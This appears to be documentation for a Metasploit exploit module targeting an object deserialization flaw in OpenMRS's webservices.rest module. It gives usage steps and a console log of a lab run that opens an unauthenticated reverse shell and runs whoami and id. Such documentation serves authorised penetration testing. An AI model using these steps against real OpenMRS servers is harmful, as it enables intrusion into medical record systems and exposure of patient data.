## Vulnerable Application

  OpenMRS is an open-source platform that supplies
  users with a customizable medical record system.

  There exists an object deserialization vulnerability
  in the `webservices.rest` module used in OpenMRS Platform
  for versions below `v2.24.0`. Unauthenticated remote code
  execution can be achieved by sending a malicious XML payload
  to a Rest API endpoint such as `/ws/rest/v1/concept`.

  Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).

  Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
  8 and Java 9.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/openmrs_deserialization```
  4. Do: ```set TARGETURI <uri>```
  5. Do: ```set RHOSTS <ip>```
  6. Do: ```run```
  7. You should get a shell.

## Options

  **ForceExploit**

  Overrides the check result and runs the exploit.

## Scenarios

### Version of software and OS as applicable

  ```
  msf5 > use exploit/multi/http/openmrs_deserialization 
  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
  rhosts => 192.168.37.168
  msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
  targeturi => /openmrs-standalone
  msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/http/openmrs_deserialization) > check
  [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
  msf5 exploit(multi/http/openmrs_deserialization) > run

  [*] Started reverse TCP double handler on 192.168.37.1:4444 
  [*] Target is running OpenMRS
  [*] Formatting payload
  [*] Sending payload...
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [*] Command: echo wKYK4x9ZOHJ37tm7;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket B
  [*] B: "wKYK4x9ZOHJ37tm7\r\n"
  [*] Matching...
  [*] A is input...
  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600

  whoami
  space
  id
  uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
  ```